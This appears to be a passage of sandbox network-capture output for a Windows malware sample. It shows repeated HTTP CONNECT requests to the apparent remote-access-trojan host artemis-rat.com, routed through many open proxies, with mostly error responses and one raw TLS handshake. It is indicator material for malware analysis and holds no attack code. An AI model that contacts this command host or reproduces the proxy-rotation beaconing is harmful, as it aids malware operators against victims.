                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866626024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164721012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.554167032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.257069111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.384270906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              931192.168.2.45315543.153.11.584437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.156244040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              932192.168.2.45315843.153.11.584437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.159065008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              933192.168.2.45288652.196.1.182807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.165436983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.442014933 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:21.489233017 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b0 37 4d fc b5 5b 80 e9 26 1f 8b 35 1e 68 0a e8 ee d2 93 72 e6 32 3d 4f 30 86 ac 04 5c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhe7M[&5hr2=O0\*,+0/$#('=<5/artemis-rat.com#]Toi{"9V<bXGx|gEs1Zee\eDb@)Mxom
                                              Mar 11, 2024 08:37:21.757281065 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 85 c6 4f 69 7a 41 43 94 d2 96 d0 01 99 29 f7 3d 33 40 e2 0c 61 a4 a3 f6 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9OizAC)=3@aDOWNGRD0000*H010Uartemis-rat.com0240311071229Z260311071229Z010Uartemis-rat.com0"0*H0eVz
                                              Mar 11, 2024 08:37:21.759505033 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c0 58 32 5b d0 b4 0a d7 de 12 1b 56 f2 7d 78 75 76 8c 03 3f bf 21 75 08 70 96 e2 58 fc 26 ae 75 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 33 fc 90 ac 72 b1 55 10 89 c3 bc 3d d2 c6 84 4b d8 8e 15 c3 99
                                              Data Ascii: %! X2[V}xuv?!upX&u(3rU=K#<fEE{AC
                                              Mar 11, 2024 08:37:22.027075052 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 6b f9 62 b6 a7 8c bc 5b 16 93 9e da 2b 6f b4 f6 91 45 b6 8f 6d 29 2a ab 87 34 97 00 ac 90 87 5c 23 21 c0 7e 04 2a 52 1b
                                              Data Ascii: (kb[+oEm)*4\#!~*R


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              934192.168.2.450664194.145.209.18731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.168297052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366298914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366522074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366420984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.460323095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.460067987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.460012913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.459980965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              935192.168.2.45275180.249.112.162807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.174515009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.574778080 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              936192.168.2.45273861.133.66.6990027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.174640894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.576992035 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              937192.168.2.450612161.97.132.22731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.175260067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366478920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366524935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366429090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.460357904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              938192.168.2.452832113.143.37.8290027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.192261934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              939192.168.2.45289146.17.63.166188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.239343882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.535073042 CET339INHTTP/1.1 403 Forbidden
                                              Server: squid/4.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 5
                                              X-Squid-Error: TCP_RESET 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from proxy.wakoopa.com
                                              Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                              Connection: keep-alive
                                              Data Raw: 72 65 73 65 74
                                              Data Ascii: reset


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              940192.168.2.453013104.23.119.91807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.239343882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.394450903 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              941192.168.2.45288846.35.9.110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.239805937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              942192.168.2.45251651.79.87.144304647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.240248919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292069912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366611958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366699934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.366379023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              943192.168.2.452843194.146.110.22810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.242388964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              944192.168.2.452679220.194.189.14431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.245596886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.723599911 CET719INHTTP/1.1 502 Bad Gateway
                                              Server: ZZY_WEB/20.08.18
                                              Date: Mon, 11 Mar 2024 08:00:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 563
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              945192.168.2.452790119.18.149.3480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.245596886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              946192.168.2.4528368.219.97.248807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.245699883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.598377943 CET718INHTTP/1.1 502 Bad Gateway
                                              Server: Tengine
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 571
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 31 35 3a 33 37 3a 32 31 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 15:37:21</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
